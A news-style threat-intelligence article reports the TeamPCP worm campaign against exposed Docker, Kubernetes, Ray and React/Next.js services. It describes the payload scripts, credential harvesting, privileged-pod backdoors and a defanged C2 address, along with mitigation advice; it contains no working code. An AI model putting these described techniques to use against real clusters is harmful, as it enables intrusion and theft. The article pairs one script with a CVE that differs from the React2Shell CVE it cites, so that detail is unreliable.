TeamPCP Worm Exploits Cloud Infrastructure to Build Criminal Infrastructure

Massive Cloud Cyberattack Exploits Docker, Kubernetes, and React Vulnerabilities to Build Criminal Infrastructure at Scale

A devastating cloud-native cyberattack campaign has been uncovered, targeting exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and vulnerable React/Next.js applications to create a sprawling criminal infrastructure. The operation, which began around December 25, 2025, has been attributed to a sophisticated threat actor known as TeamPCP (also operating under aliases like DeadCatx3, PCPcat, PersyPCP, and ShellForce).

According to cybersecurity researchers at Flare, this “worm-driven” campaign represents one of the most comprehensive cloud exploitation operations ever documented. The attackers leveraged the critical React2Shell vulnerability (CVE-2025-55182, CVSS score: 10.0) alongside numerous other attack vectors to systematically compromise cloud environments across North America, Europe, and the Middle East.

Operation Scale and Infrastructure

TeamPCP has established what researchers describe as a “self-propagating criminal ecosystem” that functions as a cloud-native cybercrime platform. The operation’s infrastructure includes over 700 members on their Telegram channel, where stolen data from victims in Canada, Serbia, South Korea, the UAE, and the United States is publicly shared.

The campaign’s primary objectives include building distributed proxy and scanning infrastructure at scale, followed by server compromise for data exfiltration, ransomware deployment, extortion activities, and cryptocurrency mining operations. What makes this attack particularly concerning is its operational integration and industrial-scale automation rather than technical novelty.

Technical Exploitation Methodology

Rather than developing novel attack techniques, TeamPCP relies on proven methods including existing tools, known vulnerabilities, and widespread misconfigurations. The attack chain begins with automated scanning for exposed cloud services, followed by systematic exploitation using specialized payloads.

The core attack components include:

• proxy.sh: A sophisticated payload that performs environment fingerprinting, detecting Kubernetes clusters and deploying cluster-specific secondary payloads. When Kubernetes is detected, the script branches into specialized execution paths with distinct tooling for cloud-native targets.

• scanner.py: Designed to identify misconfigured Docker APIs and Ray dashboards by downloading CIDR lists from the GitHub account “DeadCatx3,” with built-in cryptocurrency mining capabilities through “mine.sh.”

• kube.py: Features Kubernetes-specific functionality for cluster credential harvesting, API-based resource discovery, and deployment of persistent backdoors by creating privileged pods on every node that mount the host system.

• react.py: Specifically engineered to exploit the React vulnerability (CVE-2025-29927) for achieving remote command execution at scale.

• pcpcat.py: Designed for large-scale discovery of exposed Docker APIs and Ray dashboards across extensive IP ranges, automatically deploying malicious containers or jobs that execute Base64-encoded payloads.

Command and Control Infrastructure

Researchers have identified a critical C2 server node at 67.217.57[.]240 that has been linked to the operation of Sliver, an open-source command-and-control framework increasingly abused by threat actors for post-exploitation activities. This infrastructure enables the attackers to maintain persistent access and coordinate their criminal operations across compromised environments.

Target Profile and Impact

Data analysis reveals that TeamPCP primarily targets Amazon Web Services (AWS) and Microsoft Azure environments, with attacks characterized as opportunistic rather than targeting specific industries. This approach means organizations running exposed cloud infrastructure become “collateral victims” in the broader criminal operation.

The attack’s comprehensive nature allows TeamPCP to monetize both compute resources and stolen information simultaneously. Leaked CV databases, identity records, and corporate data are published through associated channels like ShellForce to fuel ransomware operations, fraud schemes, and cybercrime reputation building. This hybrid model provides multiple revenue streams and operational resilience against takedown attempts.

Industry Response and Mitigation

Security experts emphasize that the danger posed by TeamPCP stems not from technical innovation but from their ability to integrate various attack vectors into a cohesive, automated platform. Organizations are urged to immediately audit their cloud environments for exposed APIs, implement proper authentication mechanisms, and apply security patches for known vulnerabilities including CVE-2025-55182.

The campaign demonstrates a complete lifecycle of cloud exploitation, from initial scanning through persistence establishment, data theft, and monetization. As cloud adoption continues to accelerate across industries, such comprehensive attack platforms represent an evolving threat landscape that demands enhanced security postures and continuous monitoring of cloud infrastructure.

tags: cloud security, cyberattack, Docker vulnerability, Kubernetes exploitation, React2Shell, TeamPCP, DeadCatx3, cloud-native threats, ransomware, cryptocurrency mining, data breach, AWS security, Azure security, Sliver C2, cloud infrastructure, cybersecurity incident, cloud exploitation, proxy infrastructure, worm-driven attack, cloud cybercrime

viral phrases: “massive cloud cyberattack,” “self-propagating criminal ecosystem,” “cloud-native cybercrime platform,” “industrial-scale automation,” “opportunistic cloud exploitation,” “complete lifecycle of cloud exploitation,” “hybrid monetization model,” “cloud infrastructure collateral damage,” “automated criminal platform,” “cloud security nightmare”

,